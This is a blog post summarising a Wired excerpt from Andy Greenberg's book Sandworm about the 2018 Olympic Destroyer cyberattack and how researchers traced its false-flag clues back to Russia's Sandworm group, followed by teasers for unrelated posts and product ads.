Published on October 18th, 2019 📆 | 4243 Views ⚑
0the incredible skullduggery used to try to blame the 2018 Olympic cyberattack on North Korea / Boing Boing
Wired has published another long excerpt from Sandworm, reporter Andy Greenberg's (previously) forthcoming book on the advanced Russian hacking team who took the US-Israeli Stuxnet program to the next level, attacking Ukrainian power infrastructure, literally blowing up key components of the country's power grid by attacking the embedded code in their microcontrollers.
Earlier installments focused on the escaped Notpetya worm, which jumped from its Ukrainian targets and shut down major parts of the world's logistics, doing $10b in damage, and the attacks on Ukraine.
The latest installment drills down into the devastating cyberattack on the South Korean Olympic games in 2018, which shut down whole swathes of Korean tech infrastructure and compromised the ability to carry out the games.
But the real fun started after the attacks, when the forensic specialists went to work on the malware that had been used to carry them out. These remnants were weird, tangled and obviously intentionally deceptive, designed to make a specialist believe that they had been carried out by North Korean operatives who had failed in a bid to pin the blame on others. But after intense, global effort by a variety of experts who'd been on the trail of "Sandworm" -- the Russian attackers behind the Ukraine attacks -- a consensus emerged that put the blame on the Kremlin, humiliated and furious at being excluded from the games for cheating.
Over the next two days, Matonis searched for patterns in that obfuscation that might serve as a clue. When he wasn't at his laptop, he'd turn the puzzle over in his mind, in the shower or lying on the floor of his apartment, staring up at the ceiling. Finally, he found a telling pattern in the malware specimens' encoding. Matonis declined to share with me the details of this discovery for fear of tipping off the hackers to their tell. But he could see that, like teenage punks who all pin just the right obscure band's buttons to their jackets and style their hair in the same shapes, the attempt to make the encoded files look unique had instead made one set of them a distinctly recognizable group. He soon deduced that the source of that signal in the noise was a common tool used to create each one of the booby-trapped documents. It was an open source program, easily found online, called Malicious Macro Generator.
Matonis speculated that the hackers had chosen the program in order to blend in with a crowd of other malware authors, but it had ultimately had the opposite effect, setting them apart as a distinct set. Beyond their shared tools, the malware group was also tied together by the author names Matonis pulled from the files' metadata: Almost all had been written by someone named either “AV,” “BD,” or “john.” When he looked at the command and control servers that the malware connected back to—the strings that would control the puppetry of any successful infections—all but a few of the IP addresses of those machines overlapped too. The fingerprints were hardly exact. But over the next days, he assembled a loose mesh of clues that added up to a solid net, tying the fake Word documents together.
Only after he had established those hidden connections did Matonis go back to the Word documents that had served as the vehicles for each malware sample and begin to Google-translate their contents, some written in Cyrillic. Among the files he'd tied to the Olympic Destroyer bait, Matonis found two other bait documents from the collection that dated back to 2017 and seemed to target Ukrainian LGBT activist groups, using infected files that pretended to be a gay rights organization's strategy document and a map of a Kiev Pride parade. Others targeted Ukrainian companies and government agencies with a tainted copy of draft legislation.
The Untold Story of the 2018 Olympics Cyberattack, the Most Deceptive Hack in History [Andy Greenberg/Wired]
(Image: Joan Wong/Wired)
For decades, it was a commonplace in western business that no one could afford to ignore China: whatever problems a CEO might have with China's human rights record could never outweigh the profits to be had by targeting the growing Chinese middle-class.
READ THE REST
A little over a year ago, Bloomberg stunned the world with a report that claimed that Chinese intelligence services had figured out how to put undetectable, rice-grain-sized hardware implants into servers headed for the biggest US cloud and enterprise IT firms, and that when some of the victims discovered this fact, they quietly ripped out […]
READ THE REST
How can a single, ill-conceived law wreak havoc in so many ways? It prevents you from making remix videos. It blocks computer security research. It keeps those with print disabilities from reading ebooks. It makes it illegal to repair people's cars. It makes it harder to compete with tech companies by designing interoperable products. It's even been used […]
READ THE REST
We can’t all go through life with just a pair of sneakers and flip-flops. Sometimes, you have to invest in a pair of high-quality dress shoes. However, you’ve probably discovered that high-end footwear almost always comes with eye-popping price tags. You’ve got to compromise on second-hand or just suck it up and take out a […]
READ THE REST
We have a theory about those throw blankets that are barely big enough to cover your legs. The only people who seem to make them or use them are grandmothers, and the blankets are only that small because Nana got bored halfway through the sewing job. Look, we’re sure she means well. But if you […]
READ THE REST
Remember when the default state of your online presence was anonymity? That’s not so clear-cut anymore, and the worst part is you may not even know who is using your data or what they’re using it for. Small wonder that so many people are choosing to surf through virtual private networks. VPNs filter web access […]
READ THE REST
Gloss